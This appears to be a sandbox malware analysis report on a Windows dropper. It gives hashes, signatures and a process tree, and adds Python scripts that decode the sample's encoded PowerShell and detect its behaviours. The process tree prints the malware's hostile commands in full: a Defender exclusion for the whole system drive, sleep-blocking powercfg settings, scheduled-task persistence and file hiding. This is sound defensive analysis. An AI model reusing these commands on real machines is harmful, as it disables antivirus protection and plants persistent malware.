Analysis
-
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13/07/2024, 21:06
Static task: static1
Behavioral task: behavioral1
  Sample: f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
  Resource: win10v2004-20240709-en
Behavioral task: behavioral2
  Sample: f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
  Resource: win11-20240709-en
General
-
Target: f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
Size: 2.5MB
MD5: eb51e8cbb840ace72c5a42d3e0ce2765
SHA1: 965d2300cb9627f6605a269dae2f5bc2d7eeeada
SHA256: f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b
SHA512: a578dcc069d55770d24c60aa3540680489ba44a0b4620a742a46fb9ad3085e316914750f15140170cb6fbdff35fec52b83d837d7f34ed9f2562f97214df7490d
SSDEEP: 49152:uA5JkHDjz4jI+7tjygzaQBrGpvEOB5fB8ra0bNSzee+h6bLeT1Rh77bRKwzWw:uA5Ojvd+7tpzaIML5cNnjT9R+w
Malware Config
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check that decides whether to run on this host.
  description        ioc                                                                                               Process
  Key value queried  \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation  f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
-
Executes dropped EXE (4 IoCs)
  pid   Process
  2272  7z.exe
  3484  7z.exe
  1584  7z.exe
  5116  Installer.exe
-
Loads dropped DLL (3 IoCs)
  pid   Process
  2272  7z.exe
  3484  7z.exe
  1584  7z.exe
-
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  14    pastebin.com
  15    pastebin.com
-
Power Settings (1 TTP, 1 IoC)
powercfg controls all configurable power settings on a Windows system and can be abused to keep an infected host from sleeping, hibernating or locking. Here every standby and hibernate timeout is set to 0 (never) and hibernation is switched off, so the host stays awake for the payload.
  pid  Process
  752  cmd.exe
-
Command and Scripting Interpreter: PowerShell (1 IoC)
  pid  Process
  808  powershell.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution. Both tasks created here run C:\ProgramData\Dllhost\dllhost.exe, one every 5 minutes and one hourly.
  pid   Process
  772   schtasks.exe
  3440  schtasks.exe
-
Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  5116  Installer.exe
  808   powershell.exe
  808   powershell.exe
  5116  Installer.exe
  5116  Installer.exe
  5116  Installer.exe
  5116  Installer.exe
-
Suspicious use of AdjustPrivilegeToken (14 IoCs)
The three 7z.exe instances each enable the same four privileges during extraction; privilege LUID 35 is SeCreateSymbolicLinkPrivilege, shown numerically because the sandbox did not resolve the name. The dropped Installer.exe and the powershell.exe it spawns enable SeDebugPrivilege.
  description                 pid   Process
  Token: SeRestorePrivilege   2272  7z.exe
  Token: 35                   2272  7z.exe
  Token: SeSecurityPrivilege  2272  7z.exe
  Token: SeSecurityPrivilege  2272  7z.exe
  Token: SeRestorePrivilege   3484  7z.exe
  Token: 35                   3484  7z.exe
  Token: SeSecurityPrivilege  3484  7z.exe
  Token: SeSecurityPrivilege  3484  7z.exe
  Token: SeRestorePrivilege   1584  7z.exe
  Token: 35                   1584  7z.exe
  Token: SeSecurityPrivilege  1584  7z.exe
  Token: SeSecurityPrivilege  1584  7z.exe
  Token: SeDebugPrivilege     5116  Installer.exe
  Token: SeDebugPrivilege     808   powershell.exe
-
Suspicious use of WriteProcessMemory (33 IoCs)
A parent writes into a freshly created child's address space as part of normal process creation, so this list reads as the parent/child process tree rather than as evidence of code injection. procid_target is the report's row index for the target process, not its PID.
  description                        pid   Process  procid_target
  PID 4876 wrote to memory of 948    4876  f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe  86
  PID 4876 wrote to memory of 948    4876  f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe  86
  PID 948 wrote to memory of 1776    948   cmd.exe  88
  PID 948 wrote to memory of 1776    948   cmd.exe  88
  PID 948 wrote to memory of 2272    948   cmd.exe  89
  PID 948 wrote to memory of 2272    948   cmd.exe  89
  PID 948 wrote to memory of 3484    948   cmd.exe  90
  PID 948 wrote to memory of 3484    948   cmd.exe  90
  PID 948 wrote to memory of 1584    948   cmd.exe  91
  PID 948 wrote to memory of 1584    948   cmd.exe  91
  PID 948 wrote to memory of 100     948   cmd.exe  92
  PID 948 wrote to memory of 100     948   cmd.exe  92
  PID 948 wrote to memory of 5116    948   cmd.exe  93
  PID 948 wrote to memory of 5116    948   cmd.exe  93
  PID 948 wrote to memory of 5116    948   cmd.exe  93
  PID 5116 wrote to memory of 752    5116  Installer.exe  95
  PID 5116 wrote to memory of 752    5116  Installer.exe  95
  PID 5116 wrote to memory of 752    5116  Installer.exe  95
  PID 752 wrote to memory of 808     752   cmd.exe  97
  PID 752 wrote to memory of 808     752   cmd.exe  97
  PID 752 wrote to memory of 808     752   cmd.exe  97
  PID 5116 wrote to memory of 1468   5116  Installer.exe  98
  PID 5116 wrote to memory of 1468   5116  Installer.exe  98
  PID 5116 wrote to memory of 1468   5116  Installer.exe  98
  PID 5116 wrote to memory of 1940   5116  Installer.exe  99
  PID 5116 wrote to memory of 1940   5116  Installer.exe  99
  PID 5116 wrote to memory of 1940   5116  Installer.exe  99
  PID 1468 wrote to memory of 772    1468  cmd.exe  102
  PID 1468 wrote to memory of 772    1468  cmd.exe  102
  PID 1468 wrote to memory of 772    1468  cmd.exe  102
  PID 1940 wrote to memory of 3440   1940  cmd.exe  103
  PID 1940 wrote to memory of 3440   1940  cmd.exe  103
  PID 1940 wrote to memory of 3440   1940  cmd.exe  103
-
Views/modifies file attributes (1 TTP, 1 IoC)
  pid  Process
  100  attrib.exe
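The WriteProcessMemory rows above are the quickest way to recover the whole parent/child chain when a report is shared without its process tree. The parser below is an added example written for this page (it is not tria.ge code); it reads an excerpt of the rows above with the sandbox's duplicate rows kept in, collapses them to one edge per spawn, and prints the tree. It assumes the row format shown above, `PID <parent> wrote to memory of <child> <parent> <parent image> <row>`, and that the trailing number is a report row index rather than a PID.

```python
"""Rebuild the parent/child process tree from the 'Suspicious use of WriteProcessMemory'
IoC rows. Added example written for this page, not tria.ge code. WPM_IOCS is an excerpt
of the rows above (duplicate rows kept on purpose); the row format is assumed to be
'PID <parent> wrote to memory of <child> <parent> <parent image> <report row of child>'."""
import re

WPM_IOCS = """
PID 4876 wrote to memory of 948 4876 f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe 86
PID 4876 wrote to memory of 948 4876 f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe 86
PID 948 wrote to memory of 1776 948 cmd.exe 88
PID 948 wrote to memory of 1776 948 cmd.exe 88
PID 948 wrote to memory of 2272 948 cmd.exe 89
PID 948 wrote to memory of 3484 948 cmd.exe 90
PID 948 wrote to memory of 1584 948 cmd.exe 91
PID 948 wrote to memory of 100 948 cmd.exe 92
PID 948 wrote to memory of 5116 948 cmd.exe 93
PID 948 wrote to memory of 5116 948 cmd.exe 93
PID 948 wrote to memory of 5116 948 cmd.exe 93
PID 5116 wrote to memory of 752 5116 Installer.exe 95
PID 752 wrote to memory of 808 752 cmd.exe 97
PID 5116 wrote to memory of 1468 5116 Installer.exe 98
PID 5116 wrote to memory of 1940 5116 Installer.exe 99
PID 1468 wrote to memory of 772 1468 cmd.exe 102
PID 1940 wrote to memory of 3440 1940 cmd.exe 103
"""

ENTRY_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) (\d+) (\S+) (\d+)")


def parse_edges(text):
    """Return unique (parent_pid, child_pid, parent_image) edges in first-seen order.

    The sandbox logs one row per write and a single spawn produces two or three writes,
    so rows repeat. The trailing number is the report's row index for the child, not a
    PID, and is dropped. A row whose repeated parent PID disagrees is rejected."""
    edges = {}
    for m in ENTRY_RE.finditer(text):
        parent, child, parent_again, image, _row = m.groups()
        if parent != parent_again:
            raise ValueError("malformed IoC row: " + m.group(0))
        edges.setdefault((int(parent), int(child)), image)
    return [(p, c, img) for (p, c), img in edges.items()]


def build_tree(edges):
    """Return (children, roots, images).

    children: parent PID -> child PIDs in spawn order
    roots:    PIDs that never appear as a child (the submitted sample here)
    images:   PID -> image name, known only for PIDs that spawned something"""
    children, images = {}, {}
    for parent, child, image in edges:
        children.setdefault(parent, []).append(child)
        images[parent] = image
    roots = sorted(set(children) - {child for _, child, _ in edges})
    return children, roots, images


def render(children, images, pid, depth=0):
    """Indented text lines for the subtree under pid; leaves that never spawned
    anything (mode.com, attrib.exe, powershell.exe, schtasks.exe) show as '?'."""
    lines = ["  " * depth + "%d %s" % (pid, images.get(pid, "?"))]
    for child in children.get(pid, []):
        lines.extend(render(children, images, child, depth + 1))
    return lines


if __name__ == "__main__":
    edges = parse_edges(WPM_IOCS)
    children, roots, images = build_tree(edges)
    for root in roots:
        print("\n".join(render(children, images, root)))
```

Only parent images are recoverable from this table, so leaf processes print as `?`; join the PIDs against the `pid / Process` tables of the other signatures (or the process tree below) to name them.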
Processes
-
C:\Users\Admin\AppData\Local\Temp\f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe  [depth 1, PID 4876]
  Command line: "C:\Users\Admin\AppData\Local\Temp\f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe  [depth 2, PID 948]
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\mode.com  [depth 3, PID 1776]
      Command line: mode 65,10

    C:\Users\Admin\AppData\Local\Temp\main\7z.exe  [depth 3, PID 2272]
      Command line: 7z.exe e file.zip -p2201249071693326612168609430 -oextracted
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\main\7z.exe  [depth 3, PID 3484]
      Command line: 7z.exe e extracted/file_2.zip -oextracted
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\main\7z.exe  [depth 3, PID 1584]
      Command line: 7z.exe e extracted/file_1.zip -oextracted
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\attrib.exe  [depth 3, PID 100]
      Command line: attrib +H "Installer.exe"
      - Views/modifies file attributes

    C:\Users\Admin\AppData\Local\Temp\main\Installer.exe  [depth 3, PID 5116]
      Command line: "Installer.exe"
      Note: the children below come from C:\Windows\SysWOW64, so Installer.exe is a 32-bit binary running under WOW64.
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 752]
        Command line: "cmd.exe" /C powershell -EncodedCommand "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        - Power Settings
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  [depth 5, PID 808]
          Command line: powershell -EncodedCommand "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA=="
          Decoded (base64 of the UTF-16LE script text): <#HGuSCjKsu9C#> Add-MpPreference <#dM#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#wq19bu3lK#> -Force <#2O#>
          With the <# ... #> comment padding removed this is: Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
          That excludes the entire user profile and the system drive from Microsoft Defender scanning; Installer.exe launches it before the two schtasks commands below.
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1468]
        Command line: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe  [depth 5, PID 772]
          Command line: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          - Scheduled Task/Job: Scheduled Task

      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1940]
        Command line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5834" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\schtasks.exe  [depth 5, PID 3440]
          Command line: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5834" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          - Scheduled Task/Job: Scheduled Task
-
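The part of the tree worth automating is the encoded PowerShell that Installer.exe runs through cmd.exe before the powercfg and schtasks commands. `-EncodedCommand` is base64 over the UTF-16LE text of the script, and this sample pads the script with `<# ... #>` block comments so that a plain string match on the decoded text fails. The script below is an added example written for this page, not code from tria.ge or from the sample's author: it decodes the payload, strips the comment padding, and then applies a handful of regex checks that mirror the report's own signatures (Defender exclusion, powercfg tampering, scheduled task pointing into C:\ProgramData, `attrib +H`, password-protected 7z extraction) to the command lines copied from the process tree above. The check names and regexes are mine and are not tria.ge signature definitions.

```python
"""Decode a powershell -EncodedCommand payload and run behavioural checks over the
command lines of this report. Added example written for this page, not tria.ge code:
ENCODED and COMMAND_LINES are copied from the process tree above, the check names and
regexes are my own and are not tria.ge signature definitions."""
import base64
import re

# The -EncodedCommand argument exactly as shown for PID 752 / PID 808 above.
ENCODED = (
    "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4A"
    "YwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4A"
    "dgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUA"
    "KQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA=="
)

# Command lines copied from the process tree; the benign-looking ones are kept so the
# checks can be seen to stay quiet on them.
COMMAND_LINES = [
    'C:\\Windows\\system32\\cmd.exe /c ""C:\\Users\\Admin\\AppData\\Local\\Temp\\main\\main.bat" /S"',
    "mode 65,10",
    "7z.exe e file.zip -p2201249071693326612168609430 -oextracted",
    "7z.exe e extracted/file_2.zip -oextracted",
    'attrib +H "Installer.exe"',
    '"cmd.exe" /C powershell -EncodedCommand "' + ENCODED + '" & powercfg /x -hibernate-timeout-ac 0'
    " & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0"
    " & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off",
    'SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\\ProgramData\\Dllhost\\dllhost.exe"',
    'SCHTASKS /CREATE /SC HOURLY /TN "NvStray\\NvStrayService_bk5834" /TR "C:\\ProgramData\\Dllhost\\dllhost.exe"',
]

# powershell.exe accepts -e, -ec, -enc, ... as prefixes of -EncodedCommand.
ENC_RE = re.compile(r'-e(?:c|n[a-z]*)?\s+"?([A-Za-z0-9+/=]{16,})"?', re.I)
BLOCK_COMMENT_RE = re.compile(r"<#.*?#>", re.S)


def decode_encoded_command(b64):
    """-EncodedCommand carries the script as base64 over its UTF-16LE bytes."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def strip_block_comments(script):
    """Remove <# ... #> block comments used as junk padding and normalise whitespace."""
    return " ".join(BLOCK_COMMENT_RE.sub(" ", script).split())


def deobfuscate(cmdline):
    """Replace an encoded PowerShell payload with its cleaned plaintext so the checks
    below can match on it. Anything that is not valid base64 / UTF-16LE is left as-is."""
    def _replace(m):
        try:
            plain = strip_block_comments(decode_encoded_command(m.group(1)))
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            return m.group(0)
        return "-EncodedCommand {" + plain + "}"
    return ENC_RE.sub(_replace, cmdline)


# (finding name, pattern applied to the deobfuscated command line)
CHECKS = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\b.*-Exclusion", re.I)),
    ("power_settings_tamper",
     re.compile(r"powercfg\s+/x\s+-\S*timeout-\S+\s+0\b|powercfg\s+/hibernate\s+off", re.I)),
    ("scheduled_task_persist",
     re.compile(r'schtasks\s+/create\b.*/tr\s+"?[A-Z]:\\ProgramData\\', re.I)),
    ("hidden_file_attribute", re.compile(r"\battrib\b.*\+h\b", re.I)),
    ("archive_password_extract", re.compile(r"\b7z(?:\.exe)?\s+[ex]\s.*\s-p\S+", re.I)),
]


def triage(cmdlines):
    """Map each finding name to the deobfuscated command lines that triggered it."""
    findings = {}
    for raw in cmdlines:
        clean = deobfuscate(raw)
        for name, pattern in CHECKS:
            if pattern.search(clean):
                findings.setdefault(name, []).append(clean)
    return findings


if __name__ == "__main__":
    print(strip_block_comments(decode_encoded_command(ENCODED)))
    for name, hits in triage(COMMAND_LINES).items():
        print(name, "->", len(hits), "hit(s)")
```

Decoding before matching is the point: a rule that looks for `Add-MpPreference` in the raw command line never fires on this sample, and one that looks for it in the decoded text still misses if the comment padding sits between the cmdlet and its parameter. Matching on the cleaned text catches both the exclusion and the powercfg tampering in the same line.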
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 1.6MB
MD5: 72491c7b87a7c2dd350b727444f13bb4
SHA1: 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256: 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512: 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize: 458KB
MD5: 619f7135621b50fd1900ff24aade1524
SHA1: 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256: 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512: 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize: 2.2MB
MD5: 63f1b9d1a36038c8098b5a37efb92741
SHA1: 809f30eede4cc79e65531cb853d2b945d021b8bd
SHA256: 8f845fb3f73ab9364451d57a7848c2f9085c953f05277309021b094c162d9e8e
SHA512: aaf221581eba802799cdb1e46bd7ba477e330058831080701653815f71b07e735d7d46fc13334f94bb5a2626348078e6db4f813e9c544f63b05ec4b2fdb4e1a7
-
Filesize: 21KB
MD5: d6eea09bf480e7e8fbbf58b13e124cb5
SHA1: 8ad1a6ef15dd14f09c4d1b376ca17ca05823ed5e
SHA256: 00e1f6aa291ae8157b7b54b6dc42b3fdb08bac0ce25cd6af8614ba360c0b07b6
SHA512: f3adae262a0d8446be322c4655f79af9ed1705c36caec066178d8e2cbacb89f39cdccfaebaad1958f2f76e0980e43c18d489e6cd2a7bcc80a49dffee9f2e7717
-
Filesize: 9KB
MD5: 9167575a83ebb373a7b0b38fc2bbefac
SHA1: 89473d9b619851d72be027e3290357104b9afdb2
SHA256: dce14b29a6ee1b217c10ff6d9627e5c5f41cfa754ae75e7d31546525510a2ce0
SHA512: 105cad3ac67178fa896b37b0254aadb28d50d4b45ea65d01358b557be09cdcefb75a30f5397e3d07876607b754cdc242a880db91abd872a12d565c41808c0911
-
Filesize: 1.6MB
MD5: 523621a94c9b7ea466517f725b00e2e7
SHA1: 3d070c2d26a3b0f122cf4ae2b59b00c6a539b13a
SHA256: 3e8daa43074379bf00c81870c27a8e8faf4004452a10a78d0610f49035109907
SHA512: 11138df7d8bd1d31af2e5f5bc06c7a75ae2b33d2dce663a8e522f121be3dbc27abaa25289154c219bb52ed35ac5b4bcf1125e5f7071253fd9e06af72e573a61d
-
Filesize: 1.6MB
MD5: a06f952cc7b13c41b98d4466eaa0e9d2
SHA1: 8637be26c64ed09987c6dd924626b8a4c38c4727
SHA256: 0b0d8cba1c09dff1977fcfd6b5042e83da702f022322e5b2adf757d33a9ee452
SHA512: f18a5bfa13831f6b1a91cacbb1fa7b37277ae20af824f465dade43c5620690e5ffbcddd34a98569fee187fe517107ccb4dc1bd38386b8cab3f01818df2c95b41
-
Filesize: 474B
MD5: 26b8a6174f1a14c05bbf5e0cfc12ccbf
SHA1: de66142a9bf6b22cd7511e2c9b0c01edafbd7409
SHA256: 0880304b10189062193d90d0de8ebfc26a3c1c4962bcee002ca5889dad64797d
SHA512: f758f721bf459858bd614acfe74db97ee399a02a789d3c6faf94c29a5db96e429cfefab3cdbbffabadc3ede98f0af94bf551bd5262eebddb2190151524584506